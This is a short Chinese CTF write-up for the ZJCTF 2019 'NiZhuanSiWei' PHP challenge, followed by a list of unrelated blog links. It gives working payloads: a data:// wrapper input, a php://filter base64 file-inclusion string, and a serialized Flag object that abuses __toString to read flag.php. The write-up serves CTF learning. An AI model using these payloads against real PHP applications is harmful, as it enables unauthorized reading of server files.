[ZJCTF 2019]NiZhuanSiWei

  • 开发
  • 31

关键点:

(1)file_get_contents($text,'r')

(2)include($file)

(3)$password = unserialize($password);
   echo $password;
1.变量如何变成文件输出

text=data://text/plaint,welcome to the zjctf

2. include($file)文件包含

file=php://filter/convert.base64-encode/resource=useless.php

3.反序列化

 源码

<?php  
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

构造

<?php
class Flag{  
     public $file='flag.php';
}
$a=new Flag;
echo serialize($a) ;
?>
//O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

这样构造后,$a变量就有了$file='flag.php',同时又有源码里的东西。 

然后把序列化后的赋给$password(=$a),反序列化就相当于new Flag(),这时echo,就会触发__toString()。

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-05-12 03:46:03       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-05-12 03:46:03       100 阅读

  9. 在Django里面运行非项目文件

    2024-05-12 03:46:03       82 阅读

  19. Python语言-面向对象

    2024-05-12 03:46:03       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-05-12 03:46:03       85 阅读

热门阅读

  3. springboot整合rabbitmq

    2024-05-12 03:46:03       31 阅读

  6. 移动端 3060 6G 安装配置 TensorFlow 和 Pytorch(高版本)

    2024-05-12 03:46:03       31 阅读

  7. qt 窗体嵌入到任务栏

    2024-05-12 03:46:03       34 阅读

  9. 2024- 人工智能药物设计- AIDD- 胶质母细胞瘤的相关论文研究

    2024-05-12 03:46:03       32 阅读

  10. 人工智能是什么

    2024-05-12 03:46:03       34 阅读

  15. Vue 监控变化watch

    2024-05-12 03:46:03       28 阅读

  16. 《CKA/CKAD应试指南/从docker到kubernetes 完全攻略》学习笔记 第12章 服务管理

    2024-05-12 03:46:03       29 阅读

  17. 事件组理论

    2024-05-12 03:46:03       36 阅读

  20. Python正则表达式入门指南

    2024-05-12 03:46:03       35 阅读

  22. RN使用js让输入框取消和获取焦点(及键盘的监听)

    2024-05-12 03:46:03       34 阅读

  25. Oracle完整截取汉字的方法

    2024-05-12 03:46:03       33 阅读

  26. 实现ApplicationContextAware接口完成springboot项目的初始化处理工作

    2024-05-12 03:46:03       39 阅读

  30. python格式化显示复杂对象例如字典

    2024-05-12 03:46:03       25 阅读